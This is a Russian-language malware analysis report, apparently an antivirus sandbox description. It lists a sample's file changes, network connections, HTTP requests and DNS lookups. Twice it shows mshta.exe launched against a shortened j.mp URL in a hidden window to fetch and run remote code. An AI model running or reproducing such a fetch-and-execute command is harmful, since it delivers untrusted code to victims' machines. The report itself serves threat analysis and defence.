Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' http://www.j.mp/asdaksdjqwoddaskdajk
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
Сетевая активность
Подключается к
- 'j.#p':80
- 'bi#.ly':80
- 'd1#######onjts.cloudfront.net':443
- 'x.##2.us':80
- 'o.##2.us':80
- 'oc##.###tg2.amazontrust.com':80
- 'oc##.####ca1.amazontrust.com':80
- 'cr#.####ca1.amazontrust.com':80
TCP
Запросы HTTP GET
- http://www.j.#p/asdaksdjqwoddaskdajk
- http://bi#.ly/asdaksdjqwoddaskdajk
- http://x.##2.us/x.cer
- http://o.##2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D
- http://oc##.###tg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D
- http://oc##.####ca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEjgLnWaIozse2b%2BczaaODg8%3D
- http://cr#.####ca1.amazontrust.com/rootca1.crl
Другие
- 'd1#######onjts.cloudfront.net':443
UDP
- DNS ASK j.#p
- DNS ASK bi#.ly
- DNS ASK d1#######onjts.cloudfront.net
- DNS ASK x.##2.us
- DNS ASK o.##2.us
- DNS ASK oc##.###tg2.amazontrust.com
- DNS ASK oc##.####ca1.amazontrust.com
- DNS ASK cr#.####ca1.amazontrust.com
Другое
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://www.j.mp/asdaksdjqwoddaskdajk (со скрытым окном)
